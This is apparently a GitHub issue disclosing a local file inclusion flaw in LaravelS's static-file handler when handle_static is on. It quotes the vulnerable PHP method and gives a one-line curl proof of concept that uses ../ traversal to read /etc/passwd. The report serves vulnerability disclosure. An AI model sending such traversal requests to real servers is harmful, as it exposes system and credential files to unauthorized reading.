Local File Inclusion (LFI) vulnerability
zhazhami opened this issue · 1 comments
zhazhami commented
-
Your software version (Screenshot of your startup)
Software Version PHP 8.1 Swoole 5.0.2 Laravel/Lumen 8.83 LaravelS 3.7.35 -
Detail description about this issue(error/log)
When the settings "handle_static" is true, LaravelS is affected by a LFI vulnerability.
vulnerable file: /src/Illuminate/Laravel.php
public function handleStatic(IlluminateRequest $request) { $uri = $request->getRequestUri(); if (isset(self::$staticBlackList[$uri])) { return false; } $uri = (string)str_replace("\0", '', urldecode($uri)); $requestFile = $this->conf['static_path'] . $uri; if (is_file($requestFile)) { return $this->createStaticResponse($requestFile, $request); } ...
-
Some
reproducible
code blocks andsteps
vulnerability poccurl --path-as-is "http://127.0.0.1:5200/../../../../../../etc/passwd"
hhxsv5 commented
Thanks.